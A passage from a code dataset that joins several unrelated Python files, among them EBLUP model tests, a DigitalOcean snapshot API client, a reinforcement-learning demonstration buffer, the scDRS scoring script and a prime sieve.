0.33848019,
0.33848019,
0.33848019,
0.40555003,
0.46027174,
0.46027174,
0.50576795,
]
),
atol=1e-6,
).all()
def test_random_effects_bhf_ml():
assert np.isclose(
eblup_bhf_ml.random_effects,
np.array(
[
1.8322323,
1.2218437,
-3.9308431,
-2.3261989,
7.2988558,
3.7065346,
-2.3371090,
1.0315879,
4.4367420,
-2.5647926,
-7.7046350,
-0.6642178,
]
),
atol=1e-6,
).all()
def test_re_std_bhf_ml():
assert np.isclose(eblup_bhf_ml.re_std ** 2, 47.79559, atol=1e-4)
def test_error_var_bhf_ml():
assert np.isclose(eblup_bhf_ml.error_std ** 2, 280.2311, atol=1e-4)
def test_goodness_of_fit_bhf_ml():
assert np.isclose(eblup_bhf_ml.goodness["loglike"], -159.1981)
assert np.isclose(eblup_bhf_ml.goodness["AIC"], 328.4, atol=0.1)
assert np.isclose(eblup_bhf_ml.goodness["BIC"], 336.5, atol=0.1)
def test_convergence_bhf_ml():
assert eblup_bhf_ml.convergence["achieved"] == True
assert eblup_bhf_ml.convergence["iterations"] == 3
def test_area_estimate_bhf_ml():
assert np.isclose(
np.array(list(eblup_bhf_ml.area_est.values())),
np.array(
[
122.17284832,
123.22129485,
113.85918468,
115.42994973,
136.06978025,
108.37573030,
116.84704244,
122.60003878,
110.93542654,
124.44934607,
113.41480260,
131.28369873,
]
),
atol=1e-6,
).all()
def test_area_mse_bhf_ml():
assert np.isclose(
np.array(list(eblup_bhf_ml.area_mse.values())),
np.array(
[
70.03789330,
70.14078955,
69.75891524,
71.50874622,
64.73862949,
66.13552266,
64.77099780,
66.09246929,
60.71287515,
55.31330901,
54.52024143,
51.85801645,
]
),
atol=1e-4,
).all()
eblup_bhf_ml_fpc = EblupUnitModel(method="ML")
eblup_bhf_ml_fpc.fit(ys, Xs, areas)
eblup_bhf_ml_fpc.predict(Xmean, areas_list, pop_size)
def test_area_est_bhf_ml_fpc():
assert np.isclose(
np.array(list(eblup_bhf_ml_fpc.area_est.values())),
np.array(
[
122.1926,
123.2340,
113.8007,
115.3978,
136.1457,
108.4139,
116.8129,
122.6107,
110.9733,
124.4229,
113.3680,
131.2767,
]
),
atol=1e-4,
).all()
# Bootstrap with ML
eblup_bhf_ml_boot = EblupUnitModel(method="ML")
eblup_bhf_ml_boot.fit(
ys,
Xs,
areas,
)
eblup_bhf_ml_boot.predict(Xmean, areas_list)
eblup_bhf_ml_boot.bootstrap_mse(number_reps=5, show_progress=False)
df1_ml = eblup_bhf_ml_boot.to_dataframe()
def test_bhf_ml_to_dataframe_boot_default():
assert df1_ml.shape[1] == 5
assert (df1_ml.columns == ["_parameter", "_area", "_estimate", "_mse", "_mse_boot"]).all()
df2_ml = eblup_bhf_ml_boot.to_dataframe(
col_names=["parameter", "small_area", "modelled_estimate", "taylor_mse", "boot_mse"]
)
def test_bhf_ml_to_dataframe_boot_not_default():
assert df2_ml.shape[1] == 5
assert (
df2_ml.columns
== ["parameter", "small_area", "modelled_estimate", "taylor_mse", "boot_mse"]
).all()
# Shorter output
eblup_bhf_ml_short = EblupUnitModel(method="ML")
eblup_bhf_ml_short.fit(ys, Xs, areas, intercept=True)
eblup_bhf_ml_short.predict(Xp_mean_short, pop_area_short, pop_size_short)
def test_area_estimate_bhf_ml_short():
assert np.isclose(
np.array(list(eblup_bhf_ml_short.area_est.values())),
np.array(
[
108.41385641,
116.81295596,
122.61070603,
110.97329145,
124.42291775,
113.36799091,
131.27669442,
]
),
atol=1e-6,
).all()
# @pytest.mark.skip(reason="to be fixed")
def test_area_mse_bhf_ml_short():
assert np.isclose(
np.array(list(eblup_bhf_ml_short.area_mse.values())),
np.array(
[
71.07422316,
70.52276075,
71.03548298,
65.27922762,
60.93670432,
58.91938558,
57.87424555,
]
),
atol=1e-6,
).all()
| 2.578125 | 3 |
cloudapi_digitalocean/digitaloceanapi/snapshots.py | zorani/cloudapi_digitalocean | 4 | 12760286 | from .digitaloceanapiconnection import DigitalOceanAPIConnection
import os
import time
import queue
import threading
import datetime
import random
import json
class Snapshots(DigitalOceanAPIConnection):
def __init__(self):
DigitalOceanAPIConnection.__init__(self)
self.endpoint = "/v2/snapshots"
def list_all_snapshots(self, page=0, per_page=0):
arguments = locals()
del arguments["self"]
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(self.endpoint, headers=self.headers, params=params)
def list_all_droplet_snapshots(self, page=0, per_page=0):
arguments = locals()
del arguments["self"]
arguments["resource_type"] = "droplet"
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(self.endpoint, headers=self.headers, params=params)
def list_all_volume_snapshots(self):
arguments = locals()
del arguments["self"]
arguments["resource_type"] = "volume"
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(self.endpoint, headers=self.headers, params=params)
def retrieve_snapshot_by_id(self, id):
return self.get_request(f"{self.endpoint}/{id}", headers=self.headers)
def delete_snapshot_id(self, id):
return self.delete_request(f"{self.endpoint}/{id}", headers=self.headers)
| 2.546875 | 3 |
test_segmentation.py | kulikovv/DeepWorm | 1 | 12760287 | <reponame>kulikovv/DeepWorm
from os import listdir
from os.path import join
import numpy as np
import torch
from skimage.io import imread, imsave
import matplotlib.pyplot as plt
from torch.autograd import Variable
from deepworm import get_segmentation_model
def process_image(image, net):
consts = np.load('data/consts.npy').tolist()
print(image.min(),image.max())
image_norm = (image - consts['min']) / (consts['max'] - consts['min']) - 0.5
#image_norm = (image - image.min()) / (image.max() - image.min()) - 0.5
image_norm = np.expand_dims(np.expand_dims(image_norm, 0),0)
print(image_norm.shape)
vx = Variable(torch.from_numpy(image_norm).float()).cuda()
res = net(vx)
return np.argmax(res[0].data.cpu().numpy(), 0)
if __name__ == "__main__":
net = get_segmentation_model()
net.load_state_dict(torch.load('models/semantic_worms.t7'))
net = net.cuda()
net.eval()
basepath = 'data/target_data'
#basepath = 'data/semantic_data'
for f in [f for f in listdir(basepath) if f.endswith(".tif")][:10]:
image = imread(join(basepath, f)).astype(np.float32)
res = process_image(image, net)
plt.imshow(image)
plt.waitforbuttonpress()
plt.imshow(res)
plt.waitforbuttonpress() | 2.1875 | 2 |
ceres/constraints/constraint_demonstration.py | ph4m/constrained-rl | 21 | 12760288 | <reponame>ph4m/constrained-rl<filename>ceres/constraints/constraint_demonstration.py
# Copyright (c) IBM Corp. 2018. All Rights Reserved.
# Project name: Constrained Exploration and Recovery from Experience Shaping
# This project is licensed under the MIT License, see LICENSE
from collections import deque
import numpy as np
import os
class ConstraintDemonstration(object):
'''
Demonstrations used for constraint network training.
Main attributes are state, action, and action indicator (+1 for positive, 0 for negative).
For recovery training, also store environment snapshot.
Action weight and level can also be stored, e.g., for prioritizing some actions over others if all cannot be properly separated (not implemented).
'''
__slots__ = ('snapshot', 'state', 'action', 'action_indicator', 'action_weight', 'action_level', 'is_terminal')
def __init__(self, demonstration=None, snapshot=None, state=None, action=None, action_indicator=None, action_weight=None, action_level=None, is_terminal=None):
if demonstration is None:
if is_terminal is None:
is_terminal = False
self.is_terminal = is_terminal
if self.is_terminal:
assert action is None, 'A terminal demonstration should not have associated actions'
self.is_terminal = is_terminal
self.snapshot = snapshot
self.state = state
self.action = action
self.action_indicator = action_indicator
self.action_weight = action_weight
self.action_level = action_level
else:
assert isinstance(demonstration, ConstraintDemonstration)
for _v in (snapshot, state, action, action_indicator, action_weight, is_terminal):
assert _v is None
for _k in self.__slots__:
setattr(self, _k, getattr(demonstration, _k))
def __repr__(self):
repr_str_list = []
for _k in sorted(self.__slots__):
repr_str_list.append('{0}: {1}'.format(_k, str(getattr(self, _k))))
repr_str = '{{{0}}}'.format(', '.join(repr_str_list))
return repr_str
def test_is_classified(self):
return self.action_indicator is not None
def to_dict(self):
d = {_k: getattr(self, _k) for _k in self.__slots__}
return d
class ConstraintDemonstrationTrajectory(object):
'''
A sequence of demonstrations with functions for getting the trajectory's mid-point, sub-trajectories,
and to disable recovery from demonstrations that are already sorted.
'''
def __init__(self, demonstrations=None, states=None, actions=None, action_indicators=None, action_weights=None):
if demonstrations is None:
demonstrations = []
assert states is not None, 'Provide either demonstration list or individual content'
for state, action, action_indicator, action_weight in zip(states, actions, action_indicators, action_weights):
demonstration = ConstraintDemonstration(state=state, action=action, action_indicator=action_indicator, action_weight=action_weight)
demonstrations.append(demonstration)
else:
for _e in demonstrations:
assert isinstance(_e, ConstraintDemonstration)
self.demonstrations = demonstrations
self.length_all = len(self.demonstrations)
self.length_active = self.length_all
if self.demonstrations[-1].is_terminal:
self.length_active -= 1
self.active_demonstrations = [0, self.length_active]
self.do_reset_after_last_active = False
def __len__(self):
raise ValueError('Ambiguous length: use attributes .length_all or .length_active')
def __getitem__(self, i):
return self.demonstrations[i]
def get_midpoint(self):
'''
Return the mid-point (rounded down) demonstration within the active trajectory.
'''
assert self.length_active > 0, 'Cannot get midpoint from empty demonstrations'
i_state = self.active_demonstrations[0] + int(self.length_active / 2)
if (self.length_active == 1) and self.do_reset_after_last_active:
i_state += 1
assert i_state < self.length_all
demonstration = self.demonstrations[i_state]
assert demonstration.is_terminal or demonstration.test_is_classified()
return i_state
def get_active_demonstrations_from(self, begin, remove_demonstrations=False, return_copy=True):
'''
Get a sub-trajectory starting from a given demonstration to the last active demonstration
'''
end = self.active_demonstrations[1]
demonstrations = self.demonstrations[begin:end]
if end > begin:
if remove_demonstrations: # end earlier
self.active_demonstrations[1] = begin
self.length_active = self.active_demonstrations[1] - self.active_demonstrations[0]
if return_copy:
demonstrations = [ConstraintDemonstration(_e) for _e in demonstrations]
is_resized = remove_demonstrations and (len(demonstrations) > 0)
return demonstrations, is_resized
def get_active_demonstrations_to(self, end, remove_demonstrations=False, return_copy=True):
'''
Get a sub-trajectory starting from the first active demonstration up to a given demonstration
'''
begin = self.active_demonstrations[0]
demonstrations = self.demonstrations[begin:end]
if end > begin:
if remove_demonstrations: # start later
self.active_demonstrations[0] = end
self.length_active = self.active_demonstrations[1] - self.active_demonstrations[0]
if return_copy:
demonstrations = [ConstraintDemonstration(_e) for _e in demonstrations]
is_resized = remove_demonstrations and (len(demonstrations) > 0)
return demonstrations, is_resized
def get_demonstration(self, i_state, return_copy=True):
'''
Get a chosen demonstration within the trajectory, or copy thereof for separate processing
'''
demonstration = self.demonstrations[i_state]
if return_copy:
demonstration = ConstraintDemonstration(demonstration)
return demonstration
class ConstraintDemonstrationBuffer(object):
'''
Store positive and negative demonstrations, with functions for iterating over all and write / restore.
'''
buffer_basename = 'constraint_demonstration_buffer.npz'
def __init__(self, max_size=None, positive_demonstrations=None, negative_demonstrations=None, even_split=True):
self.even_split = bool(even_split)
if max_size == None:
self.max_size = None # in case we get numpy None
self.max_size_per_buffer = None
else:
self.max_size = int(max_size)
self.max_size_per_buffer = int(self.max_size/2) if self.even_split else self.max_size
if positive_demonstrations is None:
self.positive_demonstrations = deque(maxlen=self.max_size_per_buffer)
else:
self.positive_demonstrations = deque(positive_demonstrations, maxlen=self.max_size_per_buffer)
if negative_demonstrations is None:
self.negative_demonstrations = deque(maxlen=self.max_size_per_buffer)
else:
self.negative_demonstrations = deque(negative_demonstrations, maxlen=self.max_size_per_buffer)
def __len__(self):
return len(self.positive_demonstrations) + len(self.negative_demonstrations)
def add_demonstration(self, demonstration):
'''
Store a positive or negative demonstration into the appropriate buffer and remove old demonstrations if using a shared max size.
'''
assert isinstance(demonstration, ConstraintDemonstration)
buffer_insert = self.positive_demonstrations if demonstration.action_indicator else self.negative_demonstrations
buffer_insert.append(demonstration)
if not self.even_split and max_size is not None: # check the total size
if len(self.positive_demonstrations) + len(self.negative_demonstrations) > self.max_size:
buffer_insert.popleft()
def get_random_sample(self, action_indicator=None):
'''
Get a random demonstration from positivive or negative if specified, otherwise random.
'''
if action_indicator is None:
action_indicator = np.random.rand() < 0.5
buffer_sample = self.positive_demonstrations if action_indicator else self.negative_demonstrations
assert len(buffer_sample) > 0, 'Cannot get sample from empty buffer'
i_sample = np.random.randint(0, len(buffer_sample))
demonstration = buffer_sample[i_sample]
return demonstration
def get_random_batch(self, batch_size, balance_positive_negative=False):
'''
Get a random batch of demonstrations, optionally balanced between positive and negative.
'''
if len(self.positive_demonstrations) == 0:
if len(self.negative_demonstrations) == 0:
raise ValueError('Cannot get batch from empty buffer')
else:
action_indicators = [0.] * batch_size
else:
if len(self.negative_demonstrations) == 0:
action_indicators = [1.] * batch_size
else:
action_indicators = [np.random.rand() for _ in range(batch_size)]
if balance_positive_negative: # same probability to get positive or negative
action_indicators = [_i < 0.5 for _i in action_indicators]
else:
threshold_positive = (float(len(self.positive_demonstrations)) / (len(self.positive_demonstrations) + len(self.negative_demonstrations)))
action_indicators = [_i < threshold_positive for _i in action_indicators]
batch = [self.get_random_sample(action_indicator=_i) for _i in action_indicators]
return batch
def iterate_epoch(self, batch_size):
'''
Return random batches, without balancing between positive and negative demonstrations.
'''
n_all = len(self.positive_demonstrations) + len(self.negative_demonstrations)
i_shuffle = np.arange(n_all)
np.random.shuffle(i_shuffle)
n_batches = int(np.ceil(n_all/batch_size))
for i_batch in range(n_batches):
i_demonstrations_batch = i_shuffle[(i_batch * batch_size):((i_batch + 1) * batch_size)]
demonstrations = [self.get_demonstration_from_global_index(_i) for _i in i_demonstrations_batch]
yield demonstrations
def get_demonstration_from_global_index(self, i):
'''
Return a demonstration from an index between 0 and n_positive + n_negative.
'''
if i < len(self.positive_demonstrations):
return self.positive_demonstrations[i]
else:
return self.negative_demonstrations[i - len(self.positive_demonstrations)]
def get_shuffle_indices(self, n_el, n_max):
'''
Build random indices ranging from 0 to n_el until a maximum size n_max is reached, repeating indices minimally.
'''
assert n_el > 0, 'Empty buffer'
if n_el == n_max:
i_shuffle = np.arange(n_el)
np.random.shuffle(i_shuffle)
else:
n_shuffle = int(np.ceil(n_max / n_el))
i_shuffle_list = []
for _ in range(n_shuffle):
i_shuffle_loc = np.arange(n_el)
np.random.shuffle(i_shuffle_loc)
i_shuffle_list.append(i_shuffle_loc)
i_shuffle = np.concatenate(i_shuffle_list) # gather as single list
i_shuffle = i_shuffle[:n_max] # resize to match size
return i_shuffle
def iterate_epoch_balanced(self, batch_size, n_max=0):
'''
Return batches such that every demonstration of the largest buffer appears exactly once,
with demonstrations of the other buffer re-appearing a minimum number of times to balance batches
'''
n_positive = len(self.positive_demonstrations)
n_negative = len(self.negative_demonstrations)
if n_max == 0:
n_max = max(n_positive, n_negative)
i_shuffle_positive = self.get_shuffle_indices(n_positive, n_max)
i_shuffle_negative = self.get_shuffle_indices(n_negative, n_max)
n_all = 2*n_max
i_positive = 0
i_negative = 0
n_batches = int(np.ceil(n_all/batch_size))
for i_batch in range(n_batches):
demonstrations = batch_size * [None]
for i_demonstration in range(batch_size):
is_out_positive = i_positive >= len(i_shuffle_positive)
is_out_negative = i_negative >= len(i_shuffle_negative)
if is_out_positive and is_out_negative: # both buffers have been completely iterated through
demonstrations = demonstrations[:i_demonstration]
break
elif (not is_out_positive) and (not is_out_negative): # both buffers still have demonstrations
do_add_positive = np.random.rand() < 0.5
else: # only one buffer has not been completely iterated through
do_add_positive = not is_out_positive
if do_add_positive:
demonstrations[i_demonstration] = self.positive_demonstrations[i_shuffle_positive[i_positive]]
i_positive += 1
else:
demonstrations[i_demonstration] = self.negative_demonstrations[i_shuffle_negative[i_negative]]
i_negative += 1
yield demonstrations
def check_path_backup(self, path_backup):
'''
Build path to backup file if a directory is provided, otherwise check the extension of the provided file path.
'''
if os.path.isdir(path_backup):
path_backup = os.path.join(path_backup, self.buffer_basename)
elif not path_backup[-4:] == '.npz':
path_backup = os.path.join(os.path.dirname(path_backup), self.buffer_basename)
return path_backup
def init_saver(self, path_backup):
'''
Build backup path
'''
self.path_backup = self.check_path_backup(path_backup)
def write(self, path_backup=None, verbose=True):
'''
Save buffer to disk
'''
if path_backup is None:
path_backup = self.path_backup
buffer_as_dict = {'max_size': self.max_size,
'positive_demonstrations': [_e.to_dict() for _e in self.positive_demonstrations],
'negative_demonstrations': [_e.to_dict() for _e in self.negative_demonstrations],
'even_split': self.even_split}
np.savez(path_backup, **buffer_as_dict)
if verbose:
print('Wrote buffer backup: {0} ({1} positive, {2} negative)'.format(path_backup, len(self.positive_demonstrations), len(self.negative_demonstrations)))
@classmethod
def from_backup(cls, path_backup, verbose=False):
'''
Build buffer from path
'''
demonstration_buffer = cls()
demonstration_buffer.restore_buffer(path_backup, keep_size=False, keep_newest=True, verbose=verbose)
return demonstration_buffer
def restore_buffer(self, path_backup, keep_size=True, keep_newest=True, verbose=False):
'''
Restore buffer from path
'''
if keep_size:
max_size = self.max_size
path_backup = self.check_path_backup(path_backup)
buffer_as_dict = np.load(path_backup)
positive_demonstrations = [ConstraintDemonstration(**_d) for _d in buffer_as_dict['positive_demonstrations']]
negative_demonstrations = [ConstraintDemonstration(**_d) for _d in buffer_as_dict['negative_demonstrations']]
self.__init__(max_size=buffer_as_dict['max_size'],
positive_demonstrations=positive_demonstrations,
negative_demonstrations=negative_demonstrations,
even_split=buffer_as_dict['even_split'])
if keep_size:
self.resize(max_size, keep_newest=keep_newest)
if verbose:
print('Load buffer backup: {0} ({1} positive, {2} negative)'.format(path_backup, len(self.positive_demonstrations), len(self.negative_demonstrations)))
def resize(self, new_max_size, keep_newest=True):
'''
Resize buffer and remove excess demonstrations, new or old.
'''
if self.max_size == new_max_size:
return
self.max_size = new_max_size
if self.even_split:
self.max_size_per_buffer = int(self.max_size / 2)
keep_positive = min(len(self.positive_demonstrations), self.max_size_per_buffer)
keep_negative = min(len(self.negative_demonstrations), self.max_size_per_buffer)
else:
self.max_size_per_buffer = self.max_size
total_excess = len(self.positive_demonstrations) + len(self.negative_demonstrations) - self.max_size
ratio_excess = total_excess / self.max_size
keep_positive = int(len(self.positive_demonstrations)/ratio_excess)
keep_negative = int(len(self.negative_demonstrations)/ratio_excess)
if keep_newest:
last_positive = len(self.positive_demonstrations)
first_positive = last_positive - keep_positive
last_negative = len(self.negative_demonstrations)
first_negative = last_negative - keep_negative
else:
first_positive = 0
first_negative = 0
last_positive = first_positive + keep_positive
last_negative = first_negative + keep_negative
self.positive_demonstrations = deque([self.positive_demonstrations[_i] for _i in range(first_positive, last_positive)], maxlen=self.max_size)
self.negative_demonstrations = deque([self.negative_demonstrations[_i] for _i in range(first_negative, last_negative)], maxlen=self.max_size)
def empty(self):
'''
Empty buffer
'''
self.positive_demonstrations = deque(maxlen=self.max_size)
self.negative_demonstrations = deque(maxlen=self.max_size)
def play_buffer():
'''
Load and replay demonstrations
'''
from ceres.tools import ExtraArgs
from ceres.envs import ResetterEnv
import gym
extra_args = ExtraArgs()
assert len(extra_args.constraint_demonstration_buffer) > 0, 'Required argument --constraint_demonstration_buffer'
constraint_demonstration_buffer = ConstraintDemonstrationBuffer.from_backup(extra_args.constraint_demonstration_buffer)
env = gym.make(extra_args.env_id)
env = env.unwrapped
assert isinstance(env, ResetterEnv)
env.reset()
demonstration = constraint_demonstration_buffer.positive_demonstrations[0]
env.reset_and_restore(snapshot=demonstration.snapshot)
if extra_args.render:
env.render(mode='human')
restore_positive = True
i_positive = 0
i_negative = 0
valid_commands_str = '[Enter]: play next in current buffer, [g]: switch to positive buffer, [b]: switch to negative buffer, [q] to quit'
while True:
if restore_positive:
if len(constraint_demonstration_buffer.positive_demonstrations) == 0:
print('No positive example, switch to negative')
restore_positive = False
assert len(constraint_demonstration_buffer.negative_demonstrations) > 0
else:
if len(constraint_demonstration_buffer.negative_demonstrations) == 0:
print('No negative example, switch to positive')
restore_positive = True
assert len(constraint_demonstration_buffer.positive_demonstrations) > 0
current_buffer = constraint_demonstration_buffer.positive_demonstrations if restore_positive else constraint_demonstration_buffer.negative_demonstrations
current_index = i_positive if restore_positive else i_negative
if current_index > len(current_buffer):
current_index = 0
buffer_info_str = 'Current buffer: {0} ({1}/{2})'.format(('positive' if restore_positive else 'negative'), current_index, len(current_buffer)-1)
input_str = '{0}\n Action? {1}\n'.format(buffer_info_str, valid_commands_str)
command = input(input_str)
if command == '':
demonstration = current_buffer[current_index]
env.reset_and_restore(snapshot=demonstration.snapshot)
if extra_args.render:
env.render(mode='human')
env.step(demonstration.action)
print(' Restored state {0}, played action {1}'.format(demonstration.state, demonstration.action))
if extra_args.render:
env.render(mode='human')
if restore_positive:
i_positive += 1
else:
i_negative += 1
elif command == 'b':
restore_positive = False
elif command == 'g':
restore_positive = True
elif command == 'q':
return
else:
print('Invalid command {0}. Possible commands: {1}'.format(command, valid_commands_str))
if __name__ == '__main__':
play_buffer()
| 2 | 2 |
app/views.py | mediben/PrimeNumbers | 0 | 12760289 |
def get_primes(n):
# Based on Eratosthenes Sieve
# Initially all numbers are prime until proven otherwise
# False = Prime number, True = Compose number
nonprimes = n * [False]
count = 0
nonprimes[0] = nonprimes[1] = True
prime_numbers = []
for i in range(2, n):
if not nonprimes[i]:
prime_numbers.append(i)
count += 1
for j in range(2*i, n, i):
nonprimes[j] = True
return prime_numbers
| 3.765625 | 4 |
compute_score.py | martinjzhang/scDRS | 24 | 12760290 | <reponame>martinjzhang/scDRS
import scanpy as sc
from anndata import read_h5ad
import pandas as pd
import numpy as np
import scipy as sp
import os
import time
import argparse
from statsmodels.stats.multitest import multipletests
import scdrs
"""
# Fixit
# Todo
- Implement scdrs.method.proprocess to incorporate sparse_reg_out and sparse_compute_stats
- "gene_weight" argument needs to be tested
- Check the situation where df_cov does not explicitly contain "const" but contains a linear combinition of const
# Finished
- Implement a memory efficient version
- Add --n_ctrl (default value 500)
- Add --cov_file option to regress out covariates stored in COV_FILE before feeding into the score function
- Add --ctrl_match_opt='mean_var': use mean- and var- matched control genes
- Change name from scTRS to scdrs (072721)
- Fixed: Warning for compute_score: Trying to set attribute `.X` of view, copying. (did: v_norm_score = v_raw_score.copy())
"""
VERSION = "0.0.1"
VERSION = "beta"
def convert_species_name(species):
if species in ["Mouse", "mouse", "Mus_musculus", "mus_musculus", "mmusculus"]:
return "mmusculus"
if species in ["Human", "human", "Homo_sapiens", "homo_sapiens", "hsapiens"]:
return "hsapiens"
raise ValueError("# compute_score: species name %s not supported" % species)
def main(args):
sys_start_time = time.time()
MASTHEAD = "******************************************************************************\n"
MASTHEAD += "* Single-cell disease relevance score (scDRS)\n"
MASTHEAD += "* Version %s\n" % VERSION
MASTHEAD += "* <NAME> and <NAME>\n"
MASTHEAD += "* HSPH / Broad Institute / UCLA\n"
MASTHEAD += "* MIT License\n"
MASTHEAD += "******************************************************************************\n"
###########################################################################################
###### Parse Options ######
###########################################################################################
H5AD_FILE = args.h5ad_file
H5AD_SPECIES = args.h5ad_species
COV_FILE = args.cov_file
GS_FILE = args.gs_file
GS_SPECIES = args.gs_species
CTRL_MATCH_OPT = args.ctrl_match_opt
WEIGHT_OPT = args.weight_opt
FLAG_FILTER = args.flag_filter == "True"
FLAG_RAW_COUNT = args.flag_raw_count == "True"
N_CTRL = int(args.n_ctrl)
FLAG_RETURN_CTRL_RAW_SCORE = args.flag_return_ctrl_raw_score == "True"
FLAG_RETURN_CTRL_NORM_SCORE = args.flag_return_ctrl_norm_score == "True"
FLAG_SPARSE = args.flag_sparse == "True"
OUT_FOLDER = args.out_folder
if H5AD_SPECIES != GS_SPECIES:
H5AD_SPECIES = convert_species_name(H5AD_SPECIES)
GS_SPECIES = convert_species_name(GS_SPECIES)
header = MASTHEAD
header += "Call: ./compute_score.py \\\n"
header += "--h5ad_file %s\\\n" % H5AD_FILE
header += "--h5ad_species %s\\\n" % H5AD_SPECIES
header += "--cov_file %s\\\n" % COV_FILE
header += "--gs_file %s\\\n" % GS_FILE
header += "--gs_species %s\\\n" % GS_SPECIES
header += "--ctrl_match_opt %s\\\n" % CTRL_MATCH_OPT
header += "--weight_opt %s\\\n" % WEIGHT_OPT
header += "--flag_filter %s\\\n" % FLAG_FILTER
header += "--flag_raw_count %s\\\n" % FLAG_RAW_COUNT
header += "--n_ctrl %d\\\n" % N_CTRL
header += "--flag_return_ctrl_raw_score %s\\\n" % FLAG_RETURN_CTRL_RAW_SCORE
header += "--flag_return_ctrl_norm_score %s\\\n" % FLAG_RETURN_CTRL_NORM_SCORE
header += "--out_folder %s\n" % OUT_FOLDER
print(header)
# Check options
if H5AD_SPECIES != GS_SPECIES:
if H5AD_SPECIES not in ["mmusculus", "hsapiens"]:
raise ValueError(
"--h5ad_species needs to be one of [mmusculus, hsapiens] "
"unless --h5ad_species==--gs_species"
)
if GS_SPECIES not in ["mmusculus", "hsapiens"]:
raise ValueError(
"--gs_species needs to be one of [mmusculus, hsapiens] "
"unless --h5ad_species==--gs_species"
)
if CTRL_MATCH_OPT not in ["mean", "mean_var"]:
raise ValueError("--ctrl_match_opt needs to be one of [mean, mean_var]")
if WEIGHT_OPT not in ["uniform", "vs", "inv_std", "od"]:
raise ValueError("--weight_opt needs to be one of [uniform, vs, inv_std, od]")
###########################################################################################
###### Load data ######
###########################################################################################
print("Load data:")
# Load .h5ad file
adata = read_h5ad(H5AD_FILE)
if FLAG_FILTER:
sc.pp.filter_cells(adata, min_genes=250)
sc.pp.filter_genes(adata, min_cells=50)
if FLAG_RAW_COUNT:
sc.pp.normalize_per_cell(adata, counts_per_cell_after=1e4)
sc.pp.log1p(adata)
print(
"--h5ad_file loaded: n_cell=%d, n_gene=%d (sys_time=%0.1fs)"
% (adata.shape[0], adata.shape[1], time.time() - sys_start_time)
)
# adata = adata[0:500,:].copy()
# Load .cov file and regress out covariates
if COV_FILE is not None:
df_cov = pd.read_csv(COV_FILE, sep="\t", index_col=0)
else:
df_cov = None
# Load .gs file, convert species if needed and merge with adata.var_names
dict_gs = scdrs.util.load_gs(
GS_FILE,
src_species=GS_SPECIES,
dst_species=H5AD_SPECIES,
to_intersect=adata.var_names,
)
print(
"--gs_file loaded: n_geneset=%d (sys_time=%0.1fs)"
% (len(dict_gs), time.time() - sys_start_time)
)
###########################################################################################
###### Computation ######
###########################################################################################
# Preprocess
scdrs.preprocess(adata, cov=df_cov, n_mean_bin=20, n_var_bin=20, copy=False)
# Compute score
print("Compute score:")
for trait in dict_gs:
gene_list, gene_weights = dict_gs[trait]
if len(gene_list) < 10:
print(
"trait=%s: skipped due to small size (n_gene=%d, sys_time=%0.1fs)"
% (trait, len(gene_list), time.time() - sys_start_time)
)
continue
df_res = scdrs.score_cell(
adata,
gene_list,
gene_weight=gene_weights,
ctrl_match_key=CTRL_MATCH_OPT,
n_ctrl=N_CTRL,
weight_opt=WEIGHT_OPT,
return_ctrl_raw_score=FLAG_RETURN_CTRL_RAW_SCORE,
return_ctrl_norm_score=FLAG_RETURN_CTRL_NORM_SCORE,
verbose=False,
)
df_res.iloc[:, 0:6].to_csv(
os.path.join(OUT_FOLDER, "%s.score.gz" % trait),
sep="\t",
index=True,
compression="gzip",
)
if FLAG_RETURN_CTRL_RAW_SCORE | FLAG_RETURN_CTRL_NORM_SCORE:
df_res.to_csv(
os.path.join(OUT_FOLDER, "%s.full_score.gz" % trait),
sep="\t",
index=True,
compression="gzip",
)
v_fdr = multipletests(df_res["pval"].values, method="fdr_bh")[1]
n_rej_01 = (v_fdr < 0.1).sum()
n_rej_02 = (v_fdr < 0.2).sum()
print(
"Gene set %s (n_gene=%d): %d/%d FDR<0.1 cells, %d/%d FDR<0.2 cells (sys_time=%0.1fs)"
% (
trait,
len(gene_list),
n_rej_01,
df_res.shape[0],
n_rej_02,
df_res.shape[0],
time.time() - sys_start_time,
)
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="compute score")
parser.add_argument("--h5ad_file", type=str, required=True)
parser.add_argument(
"--h5ad_species", type=str, required=True, help="one of [hsapiens, mmusculus]"
)
parser.add_argument("--cov_file", type=str, required=False, default=None)
parser.add_argument("--gs_file", type=str, required=True)
parser.add_argument(
"--gs_species", type=str, required=True, help="one of [hsapiens, mmusculus]"
)
parser.add_argument(
"--ctrl_match_opt", type=str, required=False, default="mean_var"
)
parser.add_argument("--weight_opt", type=str, required=False, default="vs")
parser.add_argument(
"--flag_sparse",
type=str,
required=False,
default="False",
help="If to use a sparse implementation, which leverages the sparsity of the data."
"The appropriate usage place would be a highly sparse count matrix in adata, and one need to correct for covarates",
)
parser.add_argument(
"--flag_filter",
type=str,
required=False,
default="True",
help="If to apply cell and gene filters to the h5ad_file data",
)
parser.add_argument(
"--flag_raw_count",
type=str,
required=False,
default="True",
help="If True, apply size factor normalization and log1p transformation",
)
parser.add_argument(
"--n_ctrl",
type=int,
required=False,
default=1000,
help="Number of control genes",
)
parser.add_argument(
"--flag_return_ctrl_raw_score",
type=str,
required=False,
default="False",
help="If True, return raw control scores",
)
parser.add_argument(
"--flag_return_ctrl_norm_score",
type=str,
required=False,
default="False",
help="If True, return normalized control scores",
)
parser.add_argument(
"--out_folder",
type=str,
required=True,
help="Save file at out_folder/trait.score.gz",
)
args = parser.parse_args()
main(args) | 2.3125 | 2 |
venv/Lib/site-packages/dask_ml/cluster/__init__.py | ZhangQingsen/CISC849Proj | 803 | 12760291 | <gh_stars>100-1000
"""Unsupervised Clustering Algorithms"""
from .k_means import KMeans # noqa
from .spectral import SpectralClustering # noqa
| 1.226563 | 1 |
bin/agent.py | johnblackford/agent | 2 | 12760292 | #! /usr/bin/env python
import sys
import runpy
sys.path.insert(0, "/Users/jblackford/Development/agent")
if __name__ == '__main__':
runpy.run_module("agent.main", run_name="__main__")
| 1.445313 | 1 |
leetcode/505.py | windniw/just-for-fun | 1 | 12760293 | <reponame>windniw/just-for-fun
"""
link: https://leetcode-cn.com/problems/the-maze-ii
problem: 求二维迷宫矩阵中,小球从 A 点到 B 点的最短路径,小球只能沿一个方向滚动直至碰壁
solution: BFS。广搜反复松弛,检查目标点是否优于之前搜索结果。
"""
class Solution:
def shortestDistance(self, maze: List[List[int]], start: List[int], destination: List[int]) -> int:
if not maze or not maze[0]:
return -1
